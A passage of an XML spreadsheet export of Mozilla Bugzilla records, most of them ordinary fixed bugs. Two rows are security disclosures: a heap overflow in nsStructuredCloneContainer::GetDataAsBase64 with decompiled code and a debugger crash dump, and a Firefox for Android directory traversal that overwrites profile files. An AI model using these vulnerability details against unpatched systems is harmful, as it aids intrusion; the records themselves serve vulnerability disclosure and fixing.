nsSocketTransport::OnSocketConnected [netwerk/base/src/nsSocketTransport2.cpp
line 1114]
nsSocketTransport::OnSocketReady [netwerk/base/src/nsSocketTransport2.cpp line 1262]
nsSocketTransportService::Run [netwerk/base/src/nsSocketTransportService2.cpp
line 516]
nsThread::Main [xpcom/threads/nsThread.cpp line 134]
_PR_NativeRunThread [pruthr.c line 455]
msvcrt.dll + 0x27fb8 (0x77c07fb8)
kernel32.dll + 0x1d33b (0x77e5d33b)</t>
        </is>
      </c>
      <c r="X3297" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3298">
      <c r="A3298" t="n">
        <v>697224</v>
      </c>
      <c r="B3298" t="inlineStr">
        <is>
          <t>2011-10-25 12:42:31 -0700</t>
        </is>
      </c>
      <c r="C3298" t="inlineStr">
        <is>
          <t>User.get should return a list of all your saved searches</t>
        </is>
      </c>
      <c r="D3298" t="inlineStr">
        <is>
          <t>2013-08-09 07:54:52 -0700</t>
        </is>
      </c>
      <c r="E3298" t="n">
        <v>1</v>
      </c>
      <c r="F3298" t="n">
        <v>1</v>
      </c>
      <c r="G3298" t="n">
        <v>4</v>
      </c>
      <c r="H3298" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3298" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3298" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K3298" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3298" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3298" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3298" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3298" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3298" t="inlineStr"/>
      <c r="Q3298" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3298" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3298" t="inlineStr">
        <is>
          <t>Bugzilla 4.4</t>
        </is>
      </c>
      <c r="T3298" t="n">
        <v>1</v>
      </c>
      <c r="U3298" t="n">
        <v>0</v>
      </c>
      <c r="V3298" t="n">
        <v>29</v>
      </c>
      <c r="W3298" t="inlineStr">
        <is>
          <t>It'd be really nice if we had access to a user's saved searches. This way we could allow users to create searches in bugzilla but have a client which can use them.
Two additional methods would be needed. One to get a list of saved searches, and another one to execute a saved search.
This would be exposed via the WebService using XMLRPC or JSONRPC.</t>
        </is>
      </c>
      <c r="X3298" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3299">
      <c r="A3299" t="n">
        <v>1126288</v>
      </c>
      <c r="B3299" t="inlineStr">
        <is>
          <t>2015-01-27 05:56:15 -0800</t>
        </is>
      </c>
      <c r="C3299" t="inlineStr">
        <is>
          <t>Change links to Search and Reports in /report/index</t>
        </is>
      </c>
      <c r="D3299" t="inlineStr">
        <is>
          <t>2015-02-04 08:36:32 -0800</t>
        </is>
      </c>
      <c r="E3299" t="n">
        <v>1</v>
      </c>
      <c r="F3299" t="n">
        <v>1</v>
      </c>
      <c r="G3299" t="n">
        <v>4</v>
      </c>
      <c r="H3299" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3299" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3299" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K3299" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3299" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3299" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3299" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3299" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3299" t="inlineStr"/>
      <c r="Q3299" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3299" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3299" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3299" t="n">
        <v>1</v>
      </c>
      <c r="U3299" t="n">
        <v>0</v>
      </c>
      <c r="V3299" t="n">
        <v>4</v>
      </c>
      <c r="W3299" t="inlineStr">
        <is>
          <t>They currently lead to Advanced Search and /report/list. Let's make them point to Super Search and Signature Report instead.</t>
        </is>
      </c>
      <c r="X3299" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3300">
      <c r="A3300" t="n">
        <v>1440792</v>
      </c>
      <c r="B3300" t="inlineStr">
        <is>
          <t>2018-02-23 13:37:07 -0800</t>
        </is>
      </c>
      <c r="C3300" t="inlineStr">
        <is>
          <t>Context menus for sites and cards are opened too far from the button</t>
        </is>
      </c>
      <c r="D3300" t="inlineStr">
        <is>
          <t>2019-06-28 14:29:46 -0700</t>
        </is>
      </c>
      <c r="E3300" t="n">
        <v>1</v>
      </c>
      <c r="F3300" t="n">
        <v>1</v>
      </c>
      <c r="G3300" t="n">
        <v>2</v>
      </c>
      <c r="H3300" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3300" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3300" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K3300" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3300" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3300" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3300" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3300" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3300" t="inlineStr"/>
      <c r="Q3300" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3300" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3300" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T3300" t="n">
        <v>1</v>
      </c>
      <c r="U3300" t="n">
        <v>0</v>
      </c>
      <c r="V3300" t="n">
        <v>4</v>
      </c>
      <c r="W3300" t="inlineStr">
        <is>
          <t>Most likely regressed from bug 1422079. Probably this selector is too broad?
https://github.com/mozilla/activity-stream/commit/e9394510e9af0b650f2535a4c53a011e3d13ae99#diff-7b5bacc5a89d9d2f63ec472e180c93f0R66</t>
        </is>
      </c>
      <c r="X3300" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3301">
      <c r="A3301" t="n">
        <v>1274008</v>
      </c>
      <c r="B3301" t="inlineStr">
        <is>
          <t>2016-05-18 12:20:37 -0700</t>
        </is>
      </c>
      <c r="C3301" t="inlineStr">
        <is>
          <t>In longitudinal, there are probably-incorrect results in settings.user_prefs</t>
        </is>
      </c>
      <c r="D3301" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E3301" t="n">
        <v>1</v>
      </c>
      <c r="F3301" t="n">
        <v>1</v>
      </c>
      <c r="G3301" t="n">
        <v>6</v>
      </c>
      <c r="H3301" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3301" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J3301" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K3301" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3301" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3301" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3301" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3301" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3301" t="inlineStr"/>
      <c r="Q3301" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3301" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3301" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3301" t="n">
        <v>1</v>
      </c>
      <c r="U3301" t="n">
        <v>0</v>
      </c>
      <c r="V3301" t="n">
        <v>16</v>
      </c>
      <c r="W3301" t="inlineStr">
        <is>
          <t>https://sql.telemetry.mozilla.org/queries/386/source
This is a probably-incorrect result. In particular it's very unlikely that many people have customized browser.startup.homepage but absolutely nobody has customized browser.startup.page.
Similarly, dougt was trying to look for the frequency of privacy.trackingprotection.enabled and that showed zero users either, which is not reasonable.
I've verified that my pings in about:telemetry include browser.startup.page customizations in the settings.userPrefs block.</t>
        </is>
      </c>
      <c r="X3301" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3302">
      <c r="A3302" t="n">
        <v>1738237</v>
      </c>
      <c r="B3302" t="inlineStr">
        <is>
          <t>2021-10-28 04:33:59 -0700</t>
        </is>
      </c>
      <c r="C3302" t="inlineStr">
        <is>
          <t>heap buffer overflow in nsStructuredCloneContainer::GetDataAsBase64 from integer overflow</t>
        </is>
      </c>
      <c r="D3302" t="inlineStr">
        <is>
          <t>2024-05-30 10:50:12 -0700</t>
        </is>
      </c>
      <c r="E3302" t="n">
        <v>1</v>
      </c>
      <c r="F3302" t="n">
        <v>1</v>
      </c>
      <c r="G3302" t="n">
        <v>3</v>
      </c>
      <c r="H3302" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3302" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3302" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3302" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3302" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3302" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3302" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3302" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3302" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][sec-survey][adv-main95+][adv-ESR91.4.0+]</t>
        </is>
      </c>
      <c r="Q3302" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3302" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3302" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T3302" t="n">
        <v>1</v>
      </c>
      <c r="U3302" t="n">
        <v>1</v>
      </c>
      <c r="V3302" t="n">
        <v>21</v>
      </c>
      <c r="W3302" t="inlineStr">
        <is>
          <t>Created attachment 9248226
poc.zip
Tested Version: Windows 10 1909 x64 memory 16G + firfox 93.0 64-bit.
####Root cause:
In functionn sStructuredCloneContainer::GetDataAsBase64, at the position #1, v10 Force conversion from 64-bit to 32-bit, which leads to Integer Overflow  vulnerability. This vulnerability can be easily exploited for Remote Code Execution Vulnerability.
The patch for this vulnerability is simple, you just need to determine if v10 overflows before calling SetLength.
####Code：
```
__int64 __fastcall nsStructuredCloneContainer::GetDataAsBase64(__int64 a1, __int64 a2)
{
  __int64 v2; // rsi
  __int64 v3; // rbx
  __int64 v4; // rax
  _QWORD *v5; // rcx
  unsigned int v6; // ebp
  _QWORD *v8; // rcx
  __int64 v9; // rax
  unsigned __int64 v10; // rdi
  __int64 v11; // rax
  signed __int64 v12; // r15
  __int64 v13; // r12
  __int64 v14; // rbx
  size_t v15; // rbp
  int v16; // eax
  __int64 v17; // [rsp+0h] [rbp-D8h]
  void *Src[2]; // [rsp+20h] [rbp-B8h]
  __int128 v19; // [rsp+30h] [rbp-A8h]
  char *v20; // [rsp+40h] [rbp-98h]
  __int64 v21; // [rsp+48h] [rbp-90h]
  int v22; // [rsp+50h] [rbp-88h]
  char v23; // [rsp+54h] [rbp-84h]
  unsigned __int64 v24; // [rsp+98h] [rbp-40h]
  v2 = a2;
  v3 = a1;
  v24 = (unsigned __int64)&amp;v17 ^ _security_cookie;
  nsTSubstring_char16_t_::Truncate(a2);
  v4 = *(_QWORD *)(v3 + 240);
  v5 = (_QWORD *)(v4 + 64);
  if ( !v4 )
    v5 = (_QWORD *)(v3 + 168);
  v6 = -2147467259;
  if ( *v5 &amp;&amp; !**(_DWORD **)(v3 + 56) &amp;&amp; !**(_DWORD **)(v3 + 64) &amp;&amp; !**(_DWORD **)(v3 + 80) &amp;&amp; !**(_DWORD **)(v3 + 72) )
  {
    v8 = (_QWORD *)(v4 + 8);
    if ( !v4 )
      v8 = (_QWORD *)(v3 + 112);
    v19 = 0i64;
    *(_OWORD *)Src = 0i64;
    if ( v8[2] )
    {
      v9 = v8[1];
      Src[1] = *(void **)v9;
      *(_QWORD *)&amp;v19 = (char *)Src[1] + *(_QWORD *)(v9 + 8);
    }
    v10 = v8[7];
    v20 = &amp;v23;
    v21 = 844497944576000i64;
    v22 = 63;
    v23 = 0;
    v6 = -2147024882;
    if ( nsTSubstring_char_::SetLength((volatile signed __int32 **)&amp;v20, v10) )
...
    if ( (unsigned __int8)nsTSubstring_char_::SetLength(&amp;v20, (unsigned int)v10, &amp;std::nothrow) ) #1
    {
      v11 = *(_QWORD *)(v3 + 240);
      v12 = v11 + 8;
      if ( !v11 )
        v12 = v3 + 112;
      if ( !(unsigned __int8)nsTSubstring_char_::EnsureMutable(&amp;v20, 0xFFFFFFFFi64) )
        NS_ABORT_OOM((unsigned int)v21);
      if ( v10 )
      {
        v13 = (__int64)v20;
        v14 = 0i64;
        do
        {
          if ( Src[1] &gt; (void *)v19 )
          {
            gMozCrashReason = "MOZ_RELEASE_ASSERT(mData &lt;= mDataEnd)";
            __debugbreak();
            MOZ_NoReturn(209i64);
          }
          v15 = v19 - (unsigned __int64)Src[1];
          if ( v10 &lt; (unsigned __int64)v19 - (unsigned __int64)Src[1] )
            v15 = v10;
          if ( !v15 )
            break;
          if ( Src[1] == (void *)v19 )
          {
            gMozCrashReason = "MOZ_RELEASE_ASSERT(!Done())";
            __debugbreak();
            MOZ_NoReturn(196i64);
          }
          memcpy_0((void *)(v13 + v14), Src[1], v15);
          v14 += v15;
          mozilla::BufferList_js::SystemAllocPolicy_::IterImpl::Advance(Src, v12, v15);
          v10 -= v15;
        }
        while ( v10 );
      }
    ....
}
```
####OOB Write details:
```
Debugging Details:
------------------
0:000&gt; r
rax=000001d4af2fe808 rbx=00000000000ad000 rcx=000001d4af2fef20
rdx=000001d4b5f16718 rsi=000001d4b57996a0 rdi=00000000fff53430
rip=00007ffd35bd151e rsp=000000036c7fb7f8 rbp=0000000000001000
 r8=00000000000008e8  r9=ffffffffffffffe8 r10=00007ffd35bd0000
r11=000001d665c00000 r12=000001d4af251808 r13=000000036c7fbaa0
r14=000000036c7fb820 r15=000001d4af205828
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
VCRUNTIME140!memcpy+0x22e:
00007ffd`35bd151e c5fd7fa1e0000000 vmovdqa ymmword ptr [rcx+0E0h],ymm4 ds:000001d4`af2ff000=??
0:000&gt; kb
RetAddr           : Args to Child                                                           : Call Site
00007ffd`16446f5b : 00000000`00000000 0000f1a7`6bbca904 000001d4`b5624000 00000003`6c7fb8b0 : VCRUNTIME140!memcpy+0x22e
00007ffd`17083170 : 0000f1a7`6bbca9e4 00000003`6c7fb978 000001d4`b5624088 00000003`6c7fb968 : xul!nsStructuredCloneContainer::GetDataAsBase64+0x18b [/builds/worker/checkouts/gecko/dom/base/nsStructuredCloneContainer.cpp @ 151]
00007ffd`1707f930 : 000001d4`b5750c00 00007ffd`165d8d8c 0000f1a7`6bbca614 fffe02e8`44f009b0 : xul!mozilla::dom::Notification::InitFromJSVal+0x80 [/builds/worker/checkouts/gecko/dom/notification/Notification.cpp @ 1952]
00007ffd`1707f7a0 : 000001d4`b5624068 00000003`6c7fbde8 fff98000`00000000 000001d4`00000c01 : xul!mozilla::dom::Notification::CreateAndShow+0xe0 [/builds/worker/checkouts/gecko/dom/notification/Notification.cpp @ 2234]
00007ffd`165f2a2d : 00000003`6c7fba88 00000000`00000000 00000000`00000002 000001d4`b735c1e0 : xul!mozilla::dom::Notification::Constructor+0x140 [/builds/worker/checkouts/gecko/dom/notification/Notification.cpp @ 779]
00007ffd`157b6066 : 000001d4`b5620001 00000003`6c7fbf00 00000000`00000000 00000000`b5010111 : xul!mozilla::dom::Notification_Binding::_constructor+0x41d [/builds/worker/workspace/obj-build/dom/bindings/NotificationBinding.cpp @ 2212]
00007ffd`159753cb : 00000101`0000fe05 00000003`6c7fc400 00007ffd`18ae8bb0 00000000`00000077 : xul!InternalConstruct+0x296 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 612]
0:000&gt; dd rcx
000001d4`af2fef20  41414141 41414141 41414141 41414141
000001d4`af2fef30  41414141 41414141 41414141 41414141
000001d4`af2fef40  41414141 41414141 41414141 41414141
000001d4`af2fef50  41414141 41414141 41414141 41414141
000001d4`af2fef60  41414141 41414141 41414141 41414141
000001d4`af2fef70  41414141 41414141 41414141 41414141
000001d4`af2fef80  41414141 41414141 41414141 41414141
000001d4`af2fef90  41414141 41414141 41414141 41414141
```
#########################################################################################################################################
This vuln is discovered by bo13oy of Cyber Kunlun Lab.
Thanks.</t>
        </is>
      </c>
      <c r="X3302" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3303">
      <c r="A3303" t="n">
        <v>919902</v>
      </c>
      <c r="B3303" t="inlineStr">
        <is>
          <t>2013-09-24 00:31:39 -0700</t>
        </is>
      </c>
      <c r="C3303" t="inlineStr">
        <is>
          <t>[B2G][Helix][System][denghuachang]Device can not enter OS and stay on the third logo after uninstall some applications</t>
        </is>
      </c>
      <c r="D3303" t="inlineStr">
        <is>
          <t>2017-10-22 20:58:36 -0700</t>
        </is>
      </c>
      <c r="E3303" t="n">
        <v>1</v>
      </c>
      <c r="F3303" t="n">
        <v>1</v>
      </c>
      <c r="G3303" t="n">
        <v>6</v>
      </c>
      <c r="H3303" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3303" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3303" t="inlineStr">
        <is>
          <t>DOM: Apps</t>
        </is>
      </c>
      <c r="K3303" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3303" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3303" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N3303" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3303" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3303" t="inlineStr"/>
      <c r="Q3303" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3303" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3303" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T3303" t="n">
        <v>1</v>
      </c>
      <c r="U3303" t="n">
        <v>0</v>
      </c>
      <c r="V3303" t="n">
        <v>24</v>
      </c>
      <c r="W3303" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; aff-kingsoft-ciba; .NET4.0C; .NET4.0E; Tablet PC 2.0)
Steps to reproduce:
[Probability]
High, about 3 devices / 1 hour
[repro steps]
No SD card, No sim card, WIFI connected.
1. Download applications(about 100 applications on the Top 100) from Marketplace through WIFI and install.
2. Play some applications, then quit. 
3. Uninstall some applications randomly.
4. Press Powerkey to restart the device.
repeat steps 2、3、4 ，sometimes  steps 3、4.
Actual results:
Device can not enter OS and stay on the third logo. 
Expected results:
Device can enter OS and work well.
[Analyze &amp; Question]
Device always stay on the third logo even reboot.
When it appears, press powerkey still can wakeup/sleep the device, and press volume key can +/- the volume, we can see the volume progress bar on the top bar at the same time.
Touch the screen and try to unlock it as the normal device. We can hear the unlock sound. Device always stay on the third logo during the above operations
We get the data from the FrameBuffer or press home+power to take a screenshot, the data is also the third logo.It is a gaia/gecko bug. 
It is a fatal bug and can not recover. 
thanks</t>
        </is>
      </c>
      <c r="X3303" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3304">
      <c r="A3304" t="n">
        <v>1317065</v>
      </c>
      <c r="B3304" t="inlineStr">
        <is>
          <t>2016-11-12 07:32:01 -0800</t>
        </is>
      </c>
      <c r="C3304" t="inlineStr">
        <is>
          <t>Remove disclaimer text on first run screen</t>
        </is>
      </c>
      <c r="D3304" t="inlineStr">
        <is>
          <t>2016-11-12 10:23:12 -0800</t>
        </is>
      </c>
      <c r="E3304" t="n">
        <v>1</v>
      </c>
      <c r="F3304" t="n">
        <v>1</v>
      </c>
      <c r="G3304" t="n">
        <v>2</v>
      </c>
      <c r="H3304" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3304" t="inlineStr">
        <is>
          <t>Focus-iOS</t>
        </is>
      </c>
      <c r="J3304" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3304" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="L3304" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3304" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3304" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3304" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3304" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q3304" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3304" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3304" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3304" t="n">
        <v>1</v>
      </c>
      <c r="U3304" t="n">
        <v>0</v>
      </c>
      <c r="V3304" t="n">
        <v>2</v>
      </c>
      <c r="W3304" t="inlineStr">
        <is>
          <t>Remove disclaimer text on first run screen</t>
        </is>
      </c>
      <c r="X3304" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3305">
      <c r="A3305" t="n">
        <v>879421</v>
      </c>
      <c r="B3305" t="inlineStr">
        <is>
          <t>2013-06-04 12:36:23 -0700</t>
        </is>
      </c>
      <c r="C3305" t="inlineStr">
        <is>
          <t>Report job times on individual slave pages in PST</t>
        </is>
      </c>
      <c r="D3305" t="inlineStr">
        <is>
          <t>2017-05-08 09:48:46 -0700</t>
        </is>
      </c>
      <c r="E3305" t="n">
        <v>1</v>
      </c>
      <c r="F3305" t="n">
        <v>1</v>
      </c>
      <c r="G3305" t="n">
        <v>5</v>
      </c>
      <c r="H3305" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3305" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3305" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3305" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3305" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3305" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3305" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3305" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3305" t="inlineStr">
        <is>
          <t>[slavehealth]</t>
        </is>
      </c>
      <c r="Q3305" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3305" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3305" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3305" t="n">
        <v>1</v>
      </c>
      <c r="U3305" t="n">
        <v>0</v>
      </c>
      <c r="V3305" t="n">
        <v>3</v>
      </c>
      <c r="W3305" t="inlineStr">
        <is>
          <t>If I load this up:
https://secure.pub.build.mozilla.org/builddata/reports/slave_health/slavetype.html?class=test&amp;type=t-xp32-ix
The systems says that these machines have not taken a job for a while:
t-xp32-ix-030 11:33:44
t-xp32-ix-120  8:35:15
but if I load their individual pages I get a different story:
https://secure.pub.build.mozilla.org/builddata/reports/slave_health/slave.html?class=test&amp;type=t-xp32-ix&amp;name=t-xp32-ix-030
https://secure.pub.build.mozilla.org/builddata/reports/slave_health/slave.html?class=test&amp;type=t-xp32-ix&amp;name=t-xp32-ix-120
http://cl.ly/PQWX
The last job is from a bit ago rather than 11 hours ago:
Windows XP 32-bit mozilla-inbound opt test mochitest-1	Tue Jun 4 10:24:57 2013	Tue Jun 4 10:43:35 2013	00:18:38</t>
        </is>
      </c>
      <c r="X3305" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3306">
      <c r="A3306" t="n">
        <v>1617928</v>
      </c>
      <c r="B3306" t="inlineStr">
        <is>
          <t>2020-02-25 08:02:56 -0800</t>
        </is>
      </c>
      <c r="C3306" t="inlineStr">
        <is>
          <t>Firefox for Android - Directory Traversal can lead to network hijacking</t>
        </is>
      </c>
      <c r="D3306" t="inlineStr">
        <is>
          <t>2024-06-08 13:16:46 -0700</t>
        </is>
      </c>
      <c r="E3306" t="n">
        <v>1</v>
      </c>
      <c r="F3306" t="n">
        <v>1</v>
      </c>
      <c r="G3306" t="n">
        <v>6</v>
      </c>
      <c r="H3306" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3306" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3306" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3306" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3306" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3306" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3306" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3306" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3306" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][adv-esr68.7+]</t>
        </is>
      </c>
      <c r="Q3306" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3306" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3306" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3306" t="n">
        <v>1</v>
      </c>
      <c r="U3306" t="n">
        <v>0</v>
      </c>
      <c r="V3306" t="n">
        <v>20</v>
      </c>
      <c r="W3306" t="inlineStr">
        <is>
          <t>Created attachment 9128841
poc.zip
It has been found the firefox android application accepts Intents from third-parties. When a crafted Intent containing a URI pointing to a custom-defined ContentProvider is sent, the application queries the ContentProvider to fetch files. This allows overwriting files under the private application folder.
By exploiting this vulnerability, it is possible to overwrite /data/data/org.mozilla.firefox/files/mozilla/profiles.ini and put a user.js file into the user's directory which can lead to network hijacking.
Vulnerability in this method:
org.mozilla.gecko.util.ContentUriUtils.getTempFilePathFromContentUri
Firefox Version: 68.5.0
Steps to reproduce:
1) see the screen record</t>
        </is>
      </c>
      <c r="X3306" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3307">
      <c r="A3307" t="n">
        <v>924334</v>
      </c>
      <c r="B3307" t="inlineStr">
        <is>
          <t>2013-10-08 02:37:07 -0700</t>
        </is>
      </c>
      <c r="C3307" t="inlineStr">
        <is>
          <t>[Music] Shuffle toggle button and 'shuffle play' button should be visually distinct</t>
        </is>
      </c>
      <c r="D3307" t="inlineStr">
        <is>
          <t>2015-10-23 14:50:37 -0700</t>
        </is>
      </c>
      <c r="E3307" t="n">
        <v>1</v>
      </c>
      <c r="F3307" t="n">
        <v>1</v>
      </c>
      <c r="G3307" t="n">
        <v>6</v>
      </c>
      <c r="H3307" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3307" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3307" t="inlineStr">
        <is>
          <t>Gaia::Music</t>
        </is>
      </c>
      <c r="K3307" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3307" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3307" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3307" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3307" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3307" t="inlineStr">
        <is>
          <t>ux-most-wanted-nov2014</t>
        </is>
      </c>
      <c r="Q3307" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3307" t="inlineStr">
        <is>
